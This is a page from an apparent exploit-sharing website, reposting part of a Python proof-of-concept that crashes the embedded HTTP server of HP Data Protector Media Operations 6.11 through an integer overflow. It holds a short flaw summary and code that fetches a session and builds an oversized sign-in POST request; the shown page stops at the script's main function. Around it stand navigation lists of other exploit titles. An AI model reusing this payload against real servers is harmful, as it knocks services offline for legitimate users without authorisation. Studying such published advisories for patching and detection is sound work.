Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > Exploit > Content
Hot Articles
MyBulletinBoard (MyBB)
Joomla Component com_con
deV!Lz Clanportal [DZCP]
Discuz! 6.0.1 (searchid)
Boonex Dolphin 6.1.2 Mul
AuraCMS
pmaPWN! - phpMyAdmin Cod
SMF Mod Member Awards 1.
WarFTP 1.65 (USER) Remot
CMailServer 5.4.6 (CMail
VIVOTEK and NUUO Team Up
Mozilla Firefox 3.5 (Fon
OllyDBG v1.10 and ImpREC
Joomla Component com_con
BoonEx Ray 3.5 (sIncPath
Recommend Articles
Safari + Quicktime
CMailServer 5.4.6 (CMail
trixbox (langChoice) Loc
BrewBlogger 2.1.0.1 Arbi
Joomla Component com_con
Mole Group Last Minute S
BoonEx Ray 3.5 (sIncPath
Dreampics Builder (page)
Download Accelerator Plu
OllyDBG v1.10 and ImpREC
DreamNews Manager (id) R
gapicms 9.0.2 (dirDepth)
Million Pixels 3 (id_cat
Maian Cart 1.1 Insecure
Maian Music 1.0 Insecure
New Articles
ARM ifconfig eth0 and As
HP Data Protector Media
Winamp 5.5.8 (in_mod plu
Hanso Converter 1.1.0 .o
Fat Player Media Player
Comet Bird 3.6.10 Crash
PHP Hosting Directory 2.
MySQl 5.1 DLL Hijacking
Opera Denial of Service
Multiple Buffer Overflow
Postcard Mentor - Databa
Catalog Manager Database
My Vacation Tracker DLL
Microsoft Internet Explo
linux/x86 setreuid(0,0)
HP Data Protector Media Operations 6.11 HTTP Server
  Add date: 10/26/2010   Publishing date: 10/26/2010   Hits: 250
Total 2 pages, Current page:1, Jump to page:
 

# Exploit Title: HP Data Protector Media Operations 6.11 HTTP Server Remote Integer Overflow DoS
# Date: [date]: 17/09/10
# Author: d0lc3 (@rmallof http://elotrolad0.blogspot.com/)
# Software Link: http://www.hp.com
# Version: 6.11
# Tested on: Windows XP SP3 Spa
#
#Sumary:
"""
HP Data Protector Media Operations has embebed HTTP server, allowing access through
this protocol for users.

Flaw was detected on this implementation, causing remote and pre-authenticated DoS: Integer Overflow
handling string sended length through POST method.

Integer Overflow causes unexpected variable initiation (reset to 0) followed by its dereferenciation
(NUll Dereference), crashing server and thus deniying service to legitimate users.

This is not explpoitable.
"""
#PoC:

#!/usr/bin/python

import socket,sys,time,os
#global vars
neg="GET / HTTP/1.1\r\n\r\n"
lim0="Location:"      
lim1="&"
lim2="sess="
buf="SignInName="+("A"*0x8000)+"&SignInPassword=FOO&Sign+In=Log+In" # >= 0x8000 to int overflow

def CV():
 os.system("clear")
 print"\t-HP Data Protector Media Operations 6.11-"
 print"\t    -HTTP Remote Denial of Service-"
 print"\n[+] Researcher:\tRoi Mallo (@rmallof)"
 print"[+] Blog:\thttp://elotrolad0.blogspot.com/"
 print"[+] Twitter:\thttps://www.twitter.com/rmallof"
 print"\n\n"

def nego(h):         #starting connection and getting session
 s=socket.socket()
 try:
  s.connect(h)
 except:
  print"[x] Error connecting to remote host!"
  sys.exit(0)
 s.send(neg)
 time.sleep(1)
 rec=s.recv(1024)
 s.close()
 return rec

def buildPOST(s,h,p,b):        #building POST request for crashes server
 P="POST /4daction/wHandleURLs/handleSignIn?sess="+s+"&siteCode=0&lang=en& HTTP/1.1\r\n"
 P+="Host: "+h+"\r\n"
 P+="User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; es-ES; rv:1.9.2.10) Gecko/20100915 Ubuntu/10.04 (lucid) Firefox/3.6.10\r\n"
 P+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
 P+="Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3\r\n"
 P+="Accept-Encoding: gzip,deflate\r\n"
 P+="Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"
 P+="Keep-Alive: 115\r\n"
 P+="Connection: keep-alive\r\n"
 P+="Referer: http://"+h+p+"\r\n"
 P+="Content-Type: application/x-www-form-urlencoded\r\n"
 P+="Content-Length: %s\r\n" % str(len(b))
 P+="\r\n"
 P+=b
 time.sleep(1)
 return P

def main():

 

Other pages: : 1 * 2 * Next>>
Prev:Winamp 5.5.8 (in_mod plugin) Stack Overflow Exploit Next:ARM ifconfig eth0 and Assign Address

Comment:

Category: Home > Exploit
Home